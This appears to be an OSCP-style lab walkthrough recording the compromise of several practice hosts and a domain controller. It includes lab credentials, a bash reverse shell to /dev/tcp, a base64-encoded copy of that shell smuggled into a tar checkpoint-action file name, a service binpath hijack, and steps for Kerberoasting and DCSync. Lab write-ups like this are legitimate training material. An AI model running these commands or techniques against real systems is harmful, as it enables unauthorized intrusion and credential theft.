Skip to content

OSCP C

Network

Given:

  • 192.168.167.153 MS01
  • 192.168.167.155
  • 192.168.167.156
  • 192.168.167.157

Found:

  • 10.10.127.152 DC01
  • 10.10.127.153 MS02

Creds

eric.wallows:EricLikesRunning800 (given credentials for 192.168.127.153)
web_svc:Diamond1
administrator:December31 (local admin on MS01)

other users:
tom_admin

192.168.167.155

Enumeration

Initial Access

We search for a Mobile Mouse Server exploit.

We get the script. I had to fix the line breaks. We need an HTTP server to serve the reverse shell created with msfvenom and a listener.

And run the script.

Privilege Escalation

Transfer winpeas to the host.

We have insecure permissions on a service. We can change the binary path to a malicious file and restart the service.

Transfer the reverse shell, start a listener, and:

sc config GPGOrchestrator binpath="C:\users\tim\revshell2.exe"
sc stop GPGOrchestrator
sc start GPGOrchestrator

Post Exploitation

192.168.167.156

Enumeration

Initial Access

We have Jack@oscp and then a reset password for Jack. Going to 192.168.177.156:8083, we have the Vesta panel login.

Trying Jack:3PUKsX98BMupBiCf.

Searching, I found vestaroot.py https://github.com/rekter0/exploits/blob/master/VestaCP/vestaROOT.py.

Post Exploitation

192.168.167.157

Enumeration

We can log in as anonymous in the FTP. Inside, there is a bunch of PDF templates. Using exiftools, we can get some usernames.

Initial Access

Port 20000 shows a Usermin login page.

We can try to use the usernames we have.

cassie:cassie works.

Use the command shell function.

Make a reverse shell with msfvenom and transfer it with a Python server and wget. Start an nc listener and execute the reverse shell.

Privilege Escalation

We can see a crontab file called every 2 minutes.

Tar uses a wildcard, and this can be abused to execute commands.

We need to create two files in /opt/admin. First, encode the reverse shell:

echo -n "bash -i >& /dev/tcp/192.168.45.229/5555 0>&1" | base64

touch -- "--checkpoint=1"
touch -- "--checkpoint-action=exec=bash -c 'echo YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjQ1LjIyOS81NTU1IDA+JjE= | base64 -d | bash'"

Start a listener on 5555 and wait for the cron task to execute.

Post Exploitation

192.168.167.153 MS01

Enumeration

Initial Access

We use the provided credentials eric.wallows:EricLikesRunning800.

Privilege Escalation

Transfer adpeas.ps1 and get important info.

Open an SSH tunnel.

Perform a Kerberoast attack.

Using hashcat.

Making a ping sweep gets us the third machine.

In the Erik folder, we see an admintool.exe program. If we execute it and put a password, debug is enabled and shows the password comparison in MD5 hash. We can use hashcat to get it.

Post Exploitation

We enter as administrator with the password we got.

Checking admin PS history, we have a password.

Checking with CME.

10.10.127.154 MS02

Enumeration

Initial Access

Using credentials found in MS01.

Post Exploitation

There is a windows.old on C:, so we download SAM and SYSTEM using Evil-WinRM embedded download.

Using impacket-secretsdump.

We know that tom_admin can perform DCSync to the DC, so we can secretsdump with his hash.

10.10.127.152 DC01

Enumeration

Initial Access

We have the hash for tom_admin, so we perform a DCSync to the DC.

Using the hash: